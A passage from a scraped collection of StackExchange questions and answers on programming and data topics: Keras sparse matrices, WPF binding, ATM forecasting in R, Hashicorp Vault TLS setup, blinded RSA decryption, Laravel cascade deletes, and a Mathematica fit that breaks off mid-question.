}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Why i am not able to view my Listview in android?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Usage of Sparse matrix in neural nets\n\nQuestion: I have started doing a project named Talking Data User Demographics. In this project i need to find the gender and age group of a person whose phone data is provided to me. In the datset given to me i could find only phone model and phone brand for almost 70% of the data and remaining 30% has events,event labels, location,many other features includeing model and brand. So, i thought of building a model seperately for devices with events and devices without evnts. As a part of finding correct model i have used various algorithms. When i tried neural nets i have got less log loss for devices with out events so, i thought of trying the same for devices with events also but it is giving the error \"sparse matrices are not supported.\" But if it is so it is runnning fine when i have the model for devices with out events. Below i have attached a snippet as a proof of what i have told, please help me in understanding this any suggestion would be appreciated.\nThe file attached contain a code which runs the code perfectly even when sparse matrices are used in model.fit(). 1st image\nNow in the below attached file it is giving the error when sparse matrix are passed to model.fit()second image\nplease gothrough the entire code for best reference.code snippet\n3\nComment: Please directly insert your code snippet, so your question can be later better found by someone having the same problem.\nComment: Thanks for the suggestion, I have added the code snippet please go through this and help me if you are aware of the solution.\nAnswer: Just a suggestion: Do not use a sparse matrix in a neural network as such, as it will provide bad results. Just transform your sparse matrix using PCA before running NN. You have for example PCA in scikit-learn with the option whitening which can be useful also for the gradient descent. \nIn your example you want to compare two models run with two different datasets. Two different models and two different data sets may provide completely different results. It makes no sense to compare them.\nComment: Thanks for the suggestion, I have understood what you have told me, But i have a doubt that why it is giving me an error when sparse matrices are used in NN while it hasn't given the error when used the above sparse matrix i.e you can see in the code snippet that it worked fine for 1st model and it's giving error for second model , I want to know what's the difference between them if possible how can i correct it.\nComment: Which page of your snippet exactly? Your code is huge.\nComment: NN model in 36th page is running perfectly even with sparse matrices and NN model at 38th page is raising the error.\nComment: In the two files you have two different training sets and two different models in each. That is difficult to compare.Try applying the same model once to a dataset and secondly on the other dataset and see the result.\nComment: Though the two models are different and training sets are different the error it is giving is it can't handle sparse matrix right if it is so how the 1st model has handeled the sparse matrix??\nComment: The error states that SparseTensor cannot be converted to Tensor. Your snippet is an image, so you are the only one who has access to the code. Just check which line of your code provides the error and tel us.\nComment: Hi mam i am sorry for not providing you the code earlier,here is the link for the code https:\/\/drive.google.com\/open?id=1Kjkv_JqgmDJoQNfz1kouWXQgDbhaN8IY\nComment: Please click on the link code will open if not in the page opened you will find the dowload option please download it and then you can use google colab to open. please help me in understaning the error.\nComment: OK. Please tell me what did you try in order to find the line which gives the error? Did you have difficulties in finding that line, and if it is the case, which were they?\nComment: No, it is cleaarly stating the error line that SparseTensor cannot be converted to Tensor i.e from that i have understood that usage of sparse matrix in model.fit() is causing that error so i haveconverted that entire sparse to dense and executed model has run without giving any error but i could find that the logloss that i have obtained is more. So, i thought it would give less log loss if my model runs on sparse matrix so i want to know why only this mmodel is giving error when sprase is passes while the previous worked perfectly fine.\nComment: I have done my model 1 with both sparse and dense and checked the logloss values sparse matrix has given the best so, I think even in the second model that would be the case and so trying that with sparse which is giving the error\nComment: Well, two different models and two different data sets may provide completely different results. It makes no sense to compare them, moreover without having acess to the data.\nComment: I have sent the link of code through which you can acces it. please check this link drive.google.com\/open?id=1Kjkv_JqgmDJoQNfz1kouWXQgDbhaN8IY\n","meta":{"source":"stackoverflow","title":"Usage of Sparse matrix in neural nets","dup_signals":{}},"subset":"stackexchange"} +{"text":"Binding from a property of each item inside an ItemsControl to a property of an object outside the ItemsControl\n\nQuestion: I have an ItemsControl, and a Button outside the ItemsControl. Each item inside the ItemsControl has a dependency property called \"MyProperty\" (defined in the code-behind).\nI would like to set the IsEnabled property of the Button to false when at least one of the items in the ItemsControl has the MyProperty property set to 5. (of course this is just a stupid example of a more complicated situation)\nI tried by means of a data trigger, but with no luck:\nXAML:\n<code><Window x:Class=\"cancellami24.MainWindow\"\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n Title=\"MainWindow\" Height=\"350\" Width=\"525\">\n\n <Window.Resources>\n <Style x:Key=\"MyStyle\" TargetType=\"{x:Type ContentPresenter}\">\n <Style.Triggers>\n <DataTrigger Binding=\"{Binding Path=MyProperty}\" Value=\"5\">\n <Setter Property=\"IsEnabled\" TargetName=\"MyButton\" Value=\"False\" \/><!--error on TargetName-->\n <\/DataTrigger>\n <\/Style.Triggers>\n <\/Style>\n <\/Window.Resources>\n\n <Grid>\n <Grid.RowDefinitions>\n <RowDefinition \/>\n <RowDefinition \/>\n <\/Grid.RowDefinitions>\n\n <ItemsControl x:Name=\"MyListBox\" Grid.Row=\"0\" ItemContainerStyle=\"{StaticResource MyStyle}\">\n <ItemsControl.ItemTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding Path=MyProperty, UpdateSourceTrigger=PropertyChanged, Mode=OneWay}\" \/>\n <\/DataTemplate>\n <\/ItemsControl.ItemTemplate>\n <\/ItemsControl>\n\n <Button x:Name=\"MyButton\" Grid.Row=\"1\" Click=\"MyButton_Click\"\/>\n <\/Grid>\n<\/Window>\n<\/code>\nCode-behind:\n<code>using System.Collections.ObjectModel;\nusing System.Windows;\n\nnamespace cancellami24\n{\n public partial class MainWindow : Window\n {\n private readonly ObservableCollection<MyItem> myCollection = new ObservableCollection<MyItem>();\n\n public MainWindow()\n {\n InitializeComponent();\n\n myCollection.Add(new MyItem(1));\n myCollection.Add(new MyItem(2));\n myCollection.Add(new MyItem(3));\n MyListBox.ItemsSource = myCollection;\n }\n\n private void MyButton_Click(object sender, RoutedEventArgs e)\n {\n myCollection[2].SetValue(MyItem.MyPropertyProperty, 5);\n }\n }\n\n public class MyItem : DependencyObject\n {\n public static readonly DependencyProperty MyPropertyProperty = DependencyProperty.Register(\"MyProperty\", typeof(int), typeof(MyItem));\n\n public MyItem(int propertyValue)\n {\n SetValue(MyPropertyProperty, propertyValue);\n }\n }\n}\n<\/code>\nAnswer: You need custom converter to solve it\n<code>public class MyConverter : IValueConverter\n{\n bool flag = false;\n var collection = value as ObservableCollection<MyItem>();\n if(collection==null) return flag;\n foreach (var item in collection)\n {\n if (item.MyProperty==5)\n {\n flag = true;\n break;\n }\n }\n return flag;\n} \n<\/code>\nAdd MyConverter to your App.xaml\n<code><local:MyConverter x:key=\"MyConverter\"\/>\n<\/code>\nXaml:\n<code><Button x:Name=\"MyButton\" IsEnabled=\"{Binding ElementName=MyListBox, Path=ItemsSource, Converter={StaticResource MyConverter}}\"\/>\n<\/code>\nComment: I want that the IsEnabled property of the button changes whenever I change a MyProperty property in one of the items. I've tested your solution (by fixing it a bit), and unfortunately the IsEnabled property is updated only once at the application start.\n","meta":{"source":"stackoverflow","title":"Binding from a property of each item inside an ItemsControl to a property of an object outside the ItemsControl","dup_signals":{}},"subset":"stackexchange"} +{"text":"ATM daily Cash forecasting\n\nQuestion: I want to do forecasting for ATM on daily transcation data.\nI have data set for sep 2013 to feb 2014 and i want to validate it for march 2014.\nso for this i had using forecast package in R and fit model ARIMA using ARIMA() function. \nI have data with trans_date ,transaction_amount, weekdays and holiday_flag.\nI fitted ARIMA model with regressor variable weekdays but in final output my forecast value not matching with actual value for march month. so please help me on this. I share with you data set which i used in my forecasting. In Sheet one there is train data and in sheet two there is validate data.\nIn this link R code is there which i used...\nhttps:\/\/docs.google.com\/document\/d\/1mPo0D-iTK5d_b0W5gG2lBmMA95__eG825fFo2yrSyIg\/edit\nIn this link dataset is there...\nhttps:\/\/docs.google.com\/spreadsheets\/d\/1-LJhxzfpMkeCwLf129D9-q5ZkGhISqrDQWCw30UE9TE\/pubhtml\nhelp on this really very appreciated....\nComment: You have some days in the dataset that have no values, e.g. Oct-30 - Nov-2. Bank panic? :)\nhttp:\/\/apps.axibase.com\/chartlab\/0baf81ba\nComment: yes i was ignor that date beacause there is zero transaction amount\nComment: how would be calculated those forecast value\nComment: Zero is a valid number. It could be a scheduled repair or bank office closing date. This type of exceptions can impact the quality of forecasting to a great extent. I used automated holt-winters. I let the system crunch numbers and identify HW parameters that best fit test data. For your data it was Alpha=0.2, Beta=0.3, Gamma=0.1. Period = 4 weeks. Data was averaged over 2 days to smooth out spikes.\nComment: did you verify your forecast value with march data which is present in sheet 2. Can you shared your code for my reference\nComment: how would you capture the seasonality? seasonality is present in weekdays.\nComment: Season is Gamma = 0.1. March data is graphed in silver color on the referenced time chart. I didn't write any code, it was produced by a machine. The machine recomputes the most fitting forecast parameters on new inputs.\nComment: Thanks Sergie for your responce, But i want to do this in R. Can any body suggest the another way to do in R\nComment: Sure, that's why I didn't post my response as an answer. Code is definitely better for learning things.\nComment: I am expecting the above question's answer from sir RandomHyndman\nAnswer: You don\u00b4t need to use the weekdays or weekend dummies if you use a seasonal Arima. You also need to treat the zero value as NA because otherwise it would be a non repetitive outlyier. The question is if you use a stationary or non-stationary model. Cash outlays sometimes are best treated as log, so I put a lambda = 0 for Box - Cox transformation. I enclosed code for both stationary and non-stationary model.\n<code>library(forecast)\n#I put an NA in 9\/1\/2014\namount <- ts(cash$Amount,start = 1, frequency = 7)\namount <- na.interp(amount, lambda = 0)\nfitar <- auto.arima(amount, xreg = cash$Holydays, lambda = 0 , stepwise = FALSE)\nfcstar <- forecast(fitar, h=30, xreg = rep(0,30))\nplot(fcstar)\nfitar1 <- auto.arima(amount, D=1, xreg = cash$Holydays, lambda = 0 , stepwise = FALSE)\nfcstar1 <- forecast(fitar1, h=30, xreg = rep(0,30))\nplot(fcstar1)\n<\/code>\nComment: Thanks Acoustesh for your response, but from this method still seasonality not capture very well. if we validate forecast value with actual data its not match ,variation is there between these value.\nAnswer: The data are collected daily, which would suggest a frequency of 365. However, what evidence do you have for \"seasonality\" in the data? I don't see any when I plot them.\n<code>library(forecast)\n# data through Feb\ndatFit <- read.csv(\"atm_fit.csv\")\n# convert 0 to NA\ndatFit$tot_amount[datFit$tot_amount==0] <- NA\nnFit <- length(datFit$tot_amount)\nbeginDay <- (as.Date(\"2013-09-01\") - as.Date(\"2013-01-01\"))\nt1 <- ts(datFit$tot_amount, start=c(2013,beginDay), freq=365)\nplot.ts(t1)\n<\/code>\n\nThe other issue is that your values are all greater than zero, so perhaps a log-transformation would be more appropriate (or use a non-Gaussian time series model). Anyway, ignoring that for now let's fit an ARIMA model.\n<code>tsMod <- auto.arima(t1, xreg=datFit$Holiday_flag)\nsummary(tsMod)\n\nSeries: tt \nARIMA(3,0,0) with non-zero mean \n\nCoefficients:\n ar1 ar2 ar3 intercept datFit$Holiday_flag\n 0.2669 0.1611 0.1102 162648.08 -11568.59\ns.e. 0.0757 0.0787 0.0772 11232.19 23829.38\n\nsigma^2 estimated as 4.711e+09: log likelihood=-2159.72\nAIC=4331.44 AICc=4331.95 BIC=4350.36\n\nTraining set error measures:\n ME RMSE MAE MPE MAPE MASE ACF1\nTraining set -0.0005199295 0.5135824 0.3887894 -0.2049583 3.350222 0.8049315 0.005689687\n<\/code>\nSo, it looks like an ARMAX(3,0,0) model is the \"best\". Now let forecast the March values and examine them.\n<code># get March data\ndatFore <- read.csv(\"atm_fore.csv\")\nnFore <- length(datFore$tot_amount)\n# forecast March values\nff <- forecast(tsMod, nFore, xreg=rep(0,nFore))\n# plot all data together\ntf <- ts(c(datFit$tot_amount,datFore$tot_amount), start=c(2013,beginDay), freq=365)\nplot.ts(tf)\n# fitted values\npoints(ff$fitted, pch=16, col=\"blue\")\n# forecasts\npoints(ff$mean, pch=16, col=\"red\")\n<\/code>\n\nSo, indeed you have a pretty lousy forecast model that basically reverts to the mean. There is no seasonality in the data, so you should not expect anything from the model either.\n","meta":{"source":"stackoverflow","title":"ATM daily Cash forecasting","dup_signals":{}},"subset":"stackexchange"} +{"text":"Hashicorp Vault error - Client sent an HTTP request to an HTTPS server\n\nQuestion: Having trouble deploying Hashicorp Vault on kubernetes\/helm. Can't get vault to work at all. I've really tried changing almost all the parameters I could and still can't get it to work and I don't know where the issue lies exactly.\nThe error I get is mainly based on <code>Error Checking Seal status\/Client sent an HTTP request to an HTTPS server.<\/code>\nIf I set <code>tls_disable=true<\/code> inside the .Values.ha.config then I get an error that vault is sealed but I still can't view the UI... I feel like deploying vault has been bipolar and it sometimes works and sometimes doesn't. Then I can't replicate where the bug lied either. This has been a headache.\nHere is my values.yaml file:\n<code>server:\n enabled: true\n ingress:\n enabled: true\n annotations:\n cert.<issuer>.cloud\/issuer: <intermediate-hostname>\n cert.<issuer>.cloud\/secretname: vault-server-tls\n cert.<issuer>.cloud\/purpose: managed\n dns.<issuer>.cloud\/class: <class>\n dns.<issuer>.cloud\/dnsnames: \"<hostname>\"\n dns.<issuer>.cloud\/ttl: \"600\"\n hosts:\n - host: \"vault.<hostname>\"\n paths: []\n tls:\n - secretName: vault-server-tls\n hosts:\n - vault.<hostname>\n extraVolumes:\n - type: secret\n name: vault-server-tls\n service:\n enabled: true\n port: 8200\n targetPort: 443\n ha:\n enabled: true\n replicas: 3\n raft:\n enabled: true\n config: |\n ui = true\n listener \"tcp\" {\n tls_disable = false\n address = \"[::]:8200\"\n cluster_address = \"[::]:8201\"\n tls_cert_file = \"\/vault\/userconfig\/vault-server-tls\/tls.crt\"\n tls_key_file = \"\/vault\/userconfig\/vault-server-tls\/tls.key\"\n tls_client_ca_file = \"\/vault\/userconfig\/vault-server-tls\/vault.ca\"\n }\n storage \"raft\" {\n path = \"\/vault\/data\"\n }\n config: |\n ui = true\n listener \"tcp\" {\n tls_disable = false\n address = \"[::]:443\"\n cluster_address = \"[::]:8201\"\n tls_cert_file = \"\/vault\/userconfig\/vault-server-tls\/tls.crt\"\n tls_key_file = \"\/vault\/userconfig\/vault-server-tls\/tls.key\"\n tls_client_ca_file = \"\/vault\/userconfig\/vault-server-tls\/vault.ca\"\n tls_require_and_verify_client_cert = false\n }\n storage \"consul\" {\n path = \"vault\"\n address = \"HOST_IP:8500\"\n }\n disable_mlock = true\n\nui:\n enabled: true\n serviceType: LoadBalancer\n externalPort: 443\n targetPort: 8200\n<\/code>\nEDIT: I'm now able to view the UI from the LoadBalancer but not from the hostname set in <code>dns.<issuer>.cloud\/dnsnames: \"<hostname>\"<\/code> under the ingress.annotations\nStill get the error but can view the UI via the LoadBalancer: <code>Readiness probe failed. Error unsealing: Error making API request. URL: PUT http:\/\/127.0.0.1:8200\/v1\/sys\/unsealCode: 400. Raw Message: Client sent an HTTP request to an HTTPS server.<\/code>\nComment: Did you see [this similar question](https:\/\/stackoverflow.com\/questions\/63564594\/hashicorp-vault-client-sent-an-http-request-to-an-https-server-readiness-pro)? Is it helpful? How exactly did you set up your cluster and which version of Kubernetes did you use? It is important for reproducing your problem.\nComment: @Miko\u0142ajG\u0142odziak Yes I've read that question. Doesn't help entirely. \nI'm using Kubernetes version 1.21 with my cluster set up on AWS. How would I change the VAULT_ADDR in the values.yaml file? The other issue is I set up the hostname in the annotations but can't view that address. Have no issues viewing the UI with the LoadBalancer address. I've used these exact same annotations for another deployment of ArgoCD and it worked perfectly fine.\nComment: You said: \"How would I change the VAULT_ADDR in the values.yaml file?\" Maybe you can [Define an environment variable for a container](https:\/\/kubernetes.io\/docs\/tasks\/inject-data-application\/define-environment-variable-container\/#define-an-environment-variable-for-a-container)? For other issue please create separate question. Is this doc helpful for you?\nAnswer: As you mentioned you faced issued of <code>Error Checking Seal status\/Client sent an HTTP request to an HTTPS server & vault is sealed<\/code>\nOnce you have deployed the vault using the helm chart you have to unseal the vault using the CLI first time and after that UI will be available to use.\nReference document : https:\/\/learn.hashicorp.com\/tutorials\/vault\/kubernetes-raft-deployment-guide?in=vault\/kubernetes#initialize-and-unseal-vault\nGet the list of pods\n<code>kubectl get pods --selector='app.kubernetes.io\/name=vault' --namespace=' vault'\n<\/code>\nExec into the pods\n<code>kubectl exec --stdin=true --tty=true vault-0 -- vault operator init\n\nkubectl exec --stdin=true --tty=true vault-0 -- vault operator unseal\n<\/code>\nonce you will unseal the vault your PODs status will get changed to 1\/1 in Ready instead of 0\/1\nComment: Not necessarily. I've been able to view the UI and unseal from there before as well. For some reason I can view the UI via the LoadBalancer now, but not from the hostname I set in the ingress with the cert being attached and valid for the hostname.\n","meta":{"source":"stackoverflow","title":"Hashicorp Vault error - Client sent an HTTP request to an HTTPS server","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can RSA be securely used for \"blind decryption\"?\n\nQuestion: Assume we have the following setup:\n\nA client with trusted storage and computing capabilities (e.g. a smartcard)\nA server with trusted computing and short-term storage capabilities (e.g. RAM + CPU, possibly with something like Intel SGX). The server has no trusted large-scale long-term storage capabilities and may only store small amounts of data confidential and integrity protected (like the HTTPS private key).\n\nThe problem is: The server should be able to be shut-down and started-up, no passwords should be involved and the server has no HSM, yet the server should be able to provide somewhat secure access to some data without the clients needing to decrypt it themselves (for complexity reasons). So the storage need to be encrypted and the transfer (-> TLS) as well.\n\nThe solution is now (what I call it): blinded decryption.\nThe server uses some homomorphic encryption scheme (e.g. EC-ElGamal or RSA) with the message space $\\mathcal M$. He chooses a random $k\\in \\mathcal M$ and uses $H(k)$ ($H:\\mathcal M \\rightarrow \\{0,1\\}^{256}$) as the key for the authenticated encryption of the data. The server now either stores the (asymmetric) encryption of $k$, called $\\mathcal E(k)$ in his trusted area of the drive(s) or may store it in an untrusted section (with back-ups) if server authentication is required and the private key for this authentication is already stored in the trusted area.\nFor the temporary unlock of the encrypted data, the server loads $\\mathcal E(k)$. Then he blinds it using some operation $f(\\cdot,\\cdot)$ (multiplication for ElGamal and RSA, addition for EC-ElGamal) using some random $r\\in \\mathcal M$ as $c=f(\\mathcal E(k),\\mathcal E(r))=\\mathcal E(g(k,r))$ with $g(\\cdot,\\cdot)$ being the \"inner homomorphism\" (same as $f$ in many cases). The $r$ is kept available in trusted short-term memory and the $c$ is sent to the client.\nThe client decrypts $c$ using his trusted device and returns $c'=g(k,r)$ to the server. Finally the server unblinds $c'$ using his $r$ and uses the obtained $k$ to derive $H(k)$ and allow access to the data.\n\nNow (finally) the question:\nGiven the above and standard assumptions (RSA-assumption, DDH-assumption in ECC and $\\mathbb Z_p^*$,$H$ is a random oracle, the symmetric encryption is secure and authenticated,...) is it safe to instantiate $\\mathcal E$ with textbook RSA?\n\nAs pointed out in the comments, every good question about \"is this secure?\" requires a threat model, so here's mine:\nThe security of the whole protocol is broken if an attacker is able to learn the secret symmetric key $H(k)$ while it's valid. The attacker may not compromise the server (i.e. he can't control\/spy on RAM \/ CPU and may not learn the stored $\\mathcal E(k)$). An attacker not breaking into the server may have successfully attacked the client (except for the trusted device) and he may be able to completely modify and read the network traffic. I think an attacker without having broken into the server may be computationally unbounded.\n\nIf not clear until now, the instantiation of $\\mathcal E(k)$ is $\\mathcal E(k):=k^e \\bmod N$ with $e,N$ being standard RSA parameters.\nComment: $\\mathcal E(k)$ is RSA KEM if $\\mathcal E$ = RSA, right? So the encryption\/decryption should be no issue...\nComment: Two observations: a) the scheme relies on $\\mathcal E$ being homomorphic, but standard non-textbook RSA is not; thus the scheme does not allow decryption with standard non-textbook RSA, thus its security is moot; first define the variant of RSA you consider for the security analysis. b) define your security goals and threat model, in particular if an adversary impersonating the server to the client (which seems trivial since the server has no credential), or actively eavesdropping connection between actual client and server, are considered a break.\nComment: @fgrieu a) I don't like it either having to rely on textbook RSA. I want to learn by this question if I could allow fall-back to RSA in case EC-ElGamal isn't an option. The problem is I don't have any other (better) options. I could use an IND-CCA2 scheme and just store the encrypted key on the server, but then the client would have to send the key *in clear* over the wire (or maybe TLS but the attacker could still break by compromising the client *or* the server and could still break the protocol with storage theft). I can't afford requiring a HSM($$$) which would be the most secure solution.\nComment: (continued), obviously (lacking better options) $\\mathcal E(k):=k^e\\bmod N$ if we decide to use textbook RSA. b) I've added the security model to the question. In short: the scheme is broken if the attacker learns the key without breaking into the server.\nComment: Some notes: It seems the server must store the client's public key in integrity-trusted storage, and $\\mathcal E(k)$ in integrity+confidentiality-trusted storage, despite the last sentence in second bullet. $\\;$ The client seems to need to know $H(k)$, and it is not told how; that part of the exchange might interfere with the rest.\nComment: @fgrieu, thank you. The public key(s) of the client are meant to be embedded into certificates signed by a smart-card based local CA (which also uses a fancy OID in the cert), so they are integrity protected (to some extend). The point of the whole protocol is that the client *never* learns $H(k)$ to prevent one leak point (one < two). Of course this screws things up as an attacker being able to just query $\\mathcal E(k)$ would have \"won the jackpot\". You need to protect *some* information, but this is always the case when you can't afford a HSM and want to perform remote decryption.\nComment: (continued) Usually this means the private TLS keys for the web- \/ mailserver, but I will change the bullet to correctly reflect the (new) threat model. In practice I'd require a mutually authenticated TLS session for the protocol so the second approach in the above was already in my mind when designing.\nAnswer: Let's try to simplify and abstract your protocol a bit. Instead of your server and client, we just have two parties, let's call them Sally and Charlie.\n\nCharlie has a key pair $K = (K_i, K_u)$ for a suitable asymmetric cryptosystem $\\mathcal E$. We assume that this cryptosystem is partially homomorphic, such that $\\mathcal E_K(a) \\otimes \\mathcal E_K(b) = \\mathcal E_K(a \\odot b)$, where $\\otimes$ and $\\odot$ are two group operations.\nSally knows the public half $K_u$ of Charlie's key pair, so that she can compute $\\mathcal E_K(a)$ given a plaintext $a$, but not the private half $K_i$ that would let her compute $a$ from $\\mathcal E_K(a)$.\nSally has a message $\\mathcal E_K(m)$ encrypted with Charlie's key pair, and wants to decrypt it without revealing the decrypted message $m$ to Charlie (or to anyone who might impersonate him).\nCharlie wants to help Sally decrypt her message, but does not wish to reveal his private key $K_i$, or anything equivalent to it, to Sally (or to anyone who might impersonate her).\n\nThe protocol you've suggested amounts to Sally picking a random element $r$ uniformly from the group of all possible plaintexts, encrypting it using $K_u$ to get $\\mathcal E_K(r)$, and sending $\\mathcal E_K(m) \\otimes \\mathcal E_K(r) = \\mathcal E_K(m \\odot r)$ to Charlie. Charlie then decrypts the message, and sends $m \\odot r$ back to Sally, who applies the group inverse $r^{-1}$ of $r$ to obtain $m = (m \\odot r) \\odot r^{-1}$:\n\n$S:\\ $choose $r$ uniformly at random, compute $E_K(r)$ and $r^{-1}$;\n$S \\to C:\\ \\mathcal E_K(m) \\otimes \\mathcal E_K(r) = \\mathcal E_K(m \\odot r)$;\n$C:\\ $decrypt $\\mathcal E_K(m \\odot r)$ to get $m \\odot r$;\n$C \\to S:\\ m \\odot r$;\n$S:\\ $compute $m = (m \\odot r) \\odot r^{-1}$.\n\nThe first security claim (that Charlie cannot learn $m$) should be easy to prove, regardless of the specific cryptosystem used. Since the plaintexts form a group, and $r$ is chosen uniformly at random from that group, $m \\cdot r$ is also uniformly distributed, and so reveals no information about $m$ to anyone who doesn't know $r$. Indeed, even if Sally repeats the protocol with several different random values $r_i$, and so reveals $m \\odot r_i$ to Charlie, this will give him no additional information as long as all the $r_i$ are uniformly chosen and independent of $m$.\nThe tricky part is the second claim, and especially the part about Charlie not revealing \"anything equivalent to $K_i$\" to Sally. After all, in the protocol as described, Charlie is acting as an unrestricted decryption oracle!\nIt seems to me that, for this protocol to make sense at all, we need at least the following assumptions:\n\nSally cannot be compromised in any manner that would directly reveal $m$ to the attacker; she can only be made to disclose $\\mathcal E_K(m)$.\nAccess to Charlie is strictly limited, so that even if an attacker obtains $\\mathcal E_K(m)$, they cannot simply query Charlie for $m$.\n\nThe latter assumption may indeed make sense in your scenario, where Charlie is physically connected to Sally (and only intermittently so connected, being securely stored at other times), if we also assume that Sally is resistant to active compromise (i.e. she may certain data items, but an attacker cannot modify her behavior). That's a pretty huge assumption in practice, but if you're willing to make it, the protocol described above seems like it should work.\n(That said, if you're really willing to make all those assumptions, why not simply have Charlie store $m$ and provide it directly to Sally upon request? I'm having some trouble coming up with a reasonable attack scenario where that wouldn't be secure, yet the protocol above would be.)\nComment: I *might* well be missing a reasonable use case for this protocol, though; it's getting late here and I really should get some sleep. What does seem clear to me, though, is that the ability to use Charlie as a decryption oracle is a major and rather fundamental security issue here.\nComment: The _part about Charlie not revealing \"anything equivalent to Ki\"_ does not seem so much of a problem to me: although we do not have a proof of that, it is widely accepted that in textbook RSA, temporary access to a decryption oracle can not allows extraction of a private key, or otherwise help the decryption of random messages drawn after access to the decryption oracle has stopped.\nComment: I would say that the protocol works, in the sense that if Sally is able to store $\\mathcal E(k)$ and keep it secret, she can get back to $k$, thus $H(k)$, without revealing these, with the help of Charlie; further, verifying what Charlie returns, which is easy, prevents an active adversary from messing with the recovered $k$. $\\;$ However I fail to see why the server does not keep $k$ or $H(k)$ rather than $\\mathcal E(k)$; if we assume Charlie does its task without any check or limit in time, that seems to achieve the same result, in a much simpler way.\nComment: @IlmariKaronen, if Charlie just sends $m$ every time Sally needs it, Charlie *knows* $m$ which increases the attack surface. The point of the protocol is to make the best out of the situation at hand (-> no HSM :( ) So while it would work, it would be \"worse\" in terms of security than the given protocol.\nComment: @fgrieu, the server *could* just store $H(k)$, but this increases the attack surface as there *may* be the case as there are (some, not many) cases where the above protocol still is secure whereas simply storing $H(k)$ would fail (f.ex. if the data is at rest, an attacker breaks the confidentiality but Charlie notices that before accepting any unlock queries and starts re-newing keys)\n","meta":{"source":"crypto.stackexchange","title":"Can RSA be securely used for \"blind decryption\"?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Laravel 4.0 cascade delete and polymorphic relations\n\nQuestion: I am using the Eloquent plymorphic relations and the <code>ON DELETE CASCADE<\/code> option of mysql, and am afraid of how my data will stay consistent over time. Let me explain:\nIf I have a model Room which contains furnitures of several types (morphMany of <code>Table<\/code>, <code>Chair<\/code>, <code>Couch<\/code>...), and that I decide to delete it, his related furnitures won't get deleted.\nTo solve this issure I handled the deletion of the related furnitures in the delete event of the <code>Room<\/code> model, but this event won't necessarily get fired all the time.\nLet's say that I have an other model called <code>House<\/code>, containing several rooms (hasMany). If I decide to delete it, its related models will deleted by mysql with the <code>ON DELETE CASCADE<\/code> option. I will then stay with data in my tables <code>tables<\/code>, <code>chairs<\/code>, <code>couchs<\/code> that are not relevant anymore, and not related to any row of the <code>rooms<\/code> table anymore.\nSo what is the best way to keep a database consistent with <code>ON DELETE CASCADE<\/code> and the Eloquent's polymorphic relations?\nAnswer: If you're using the raw database (cascading) approach, that bypasses Eloquent and it becomes impossible to do what you want.\nSet up a deleted event for House which iterates through all its Rooms and deletes those, which again triggers the Room's deleted events.\nComment: So if I understand what you say, the ability to put cascade delete in the migrations should not actually be used ever, as all the deletion should be handled by Eloquent only. Am I right ?\nComment: Sometimes cascading works fine, but if you need more advanced logic on when to delete (as is your case), use model events.\n","meta":{"source":"stackoverflow","title":"Laravel 4.0 cascade delete and polymorphic relations","dup_signals":{}},"subset":"stackexchange"} +{"text":"Making LinearModelFit account for Log on the x-axis\n\nQuestion: I have the following code that I wish to run, which consists of 6 data points that I want to fit using <code>LinearModelFit<\/code>\n<code>Clear[\"Global`*\"]\n\n\u03d50 = 2.068*10^-15;(*femto-Tm^2*)\nzchar = 50;\nLLl1 = 500*10^-12(*H*);\nLLl2 = 900*10^-12(*H*);\nLLl3 = 1000*10^-12(*H*);\nLLl4 = 1500*10^-12(*H*);\nLLl5 = 1670*10^-12(*H*);\nLLl6 = 2000*10^-12(*H*);\nI01 = \u03d50\/(2 \u03c0*LLl1);\nI02 = \u03d50\/(2 \u03c0*LLl2);\nI03 = \u03d50\/(2 \u03c0*LLl3);\nI04 = \u03d50\/(2 \u03c0*LLl4);\nI05 = \u03d50\/(2 \u03c0*LLl5);\nI06 = \u03d50\/(2 \u03c0*LLl6);\n\nIl1 = 0.0257399*Sqrt[2]*(28.3346\/26.26)*(0.5*I01)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0227dB \\gain*);\nIl2 = 0.0257399*Sqrt[2]*(15.5602\/14.43)*(0.5*I02)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.004dB \\gain*);\nIl3 = 0.0261556*Sqrt[2]*(13.985\/12.97)*(0.5*I03)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0038dB \\gain*);\nIl4 = 0.0257399*Sqrt[2]*(9.28253\/8.61)*(0.5*I04)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0358dB \\gain*);\nIl5 = 0.0257399*Sqrt[2]*(8.33335\/7.73)*(0.5*I05)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.0318dB \\gain*);\nIl6 = 0.0261566*Sqrt[2]*(6.95093\/6.448)*(0.5*I06)(*As\/Ap*Sqrt[2]*(\u03c9s\/\u03c9p)(0.5*I0) for 20.006dB \\gain*);\n\npl1 = (Il1^2*zchar)\/2*1000(*in milliWatts*);\npl2 = (Il2^2*zchar)\/2*1000(*in milliWatts*);\npl3 = (Il3^2*zchar)\/2*1000(*in milliWatts*);\npl4 = (Il4^2*zchar)\/2*1000(*in milliWatts*);\npl5 = (Il5^2*zchar)\/2*1000(*in milliWatts*);\npl6 = (Il6^2*zchar)\/2*1000(*in milliWatts*);\n\npointsLHTL = {{I01, 10 Log10[pl1]}, {I02, 10 Log10[pl2]}, {I03, \n10 Log10[pl3]}, {I04, 10 Log10[pl4]}, {I05, 10 Log10[pl5]}, {I06, 10 Log10[pl6]}};\n\nLHdynamicrange = \nListLogLinearPlot[Evaluate@pointsLHTL, \nPlotRange -> {Automatic, Automatic}, \nLabelStyle -> Directive[Black, 12], PlotLegends -> {\"LH\"}, \nJoined -> False, ImageSize -> Large, \nPlotStyle -> Directive[Blue]]\n\nLm = LinearModelFit[Log@pointsLHTL, x, x]\nLmplot = Plot[Lm[x], {x, -16, -14}, \nPlotStyle -> Directive[Blue, Dashed], PlotLegends -> {\"Linear fit\"}]\n\nShow[Lmplot, LHdynamicrange]\n<\/code>\nwhere <code>pointsLHTL<\/code> represent my data points (with the y-values under <code>Log10<\/code> and 